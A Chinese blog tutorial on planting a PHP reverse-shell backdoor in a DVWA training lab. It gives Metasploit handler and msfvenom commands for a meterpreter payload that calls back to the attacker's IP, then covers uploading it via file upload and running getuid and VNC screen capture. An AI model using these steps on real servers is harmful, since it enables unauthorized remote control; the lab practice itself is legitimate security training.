【世界快播報(bào)】PHP后門反彈演示

2023-01-14 19:18:46 來源:51CTO博客

準(zhǔn)備

一臺(tái)kali虛擬機(jī)一臺(tái) win11物理機(jī)phpstudy 開啟 Nginx和Mysqlphpstudy中已經(jīng)搭建好DVWA靶場DVWA靶場的安全等級調(diào)整值low

?

注意:


(資料圖)

需要將殺毒軟件個(gè)關(guān)了, 否則有提示, 黑客入侵.

開始

使用監(jiān)控模塊, 輸入:

use exploit/multi/handler

配置payload

set payload php/meterpreter/reverse_tcp# 接著輸入options

設(shè)置 lhost 和lport

這里發(fā)現(xiàn) 攻擊機(jī)的端口不用設(shè)置了, 已經(jīng)有了, 只要設(shè)置lhost 就可以了

set lhost 攻擊機(jī)的ip

生成php后門執(zhí)行攻擊獲得meterpreter

注意: 要新建端口, 在root權(quán)限下執(zhí)行

msfvenom -p php/meterpreter/reverse_tcp lhost=攻擊機(jī)ip  lport=4444 R>shell.php

這樣在window11左面少就有這個(gè)文件了

上傳文件

這是我原來的地址: http://dvwa/vulnerabilities/upload/#

這是我要填寫的地址: http://dvwa/hackable/uploads/shell.php

出現(xiàn)上圖幾面說明: 這是正常的, 后門已經(jīng)上傳到了靶機(jī)上

獲得權(quán)限

輸入:
run # 也可以直接輸入 exploit  , 都一樣

也可能出現(xiàn) 404, 都是正?,F(xiàn)象

只要有這兩行, 就代表上傳的后門生效了

成功啦

獲取管理員的名字, 輸入:
getuid
觀看屏幕 可以在meterpreter里輸入
run vnc

點(diǎn)開文件即可看到自己電腦的畫面

標(biāo)簽: 直接輸入 黑客入侵 可能出現(xiàn)

上一篇:【速看料】Linux下圖片處理
下一篇:通過tcpdump抓取lldp/cdp報(bào)文判斷服務(wù)器上聯(lián)網(wǎng)絡(luò)配置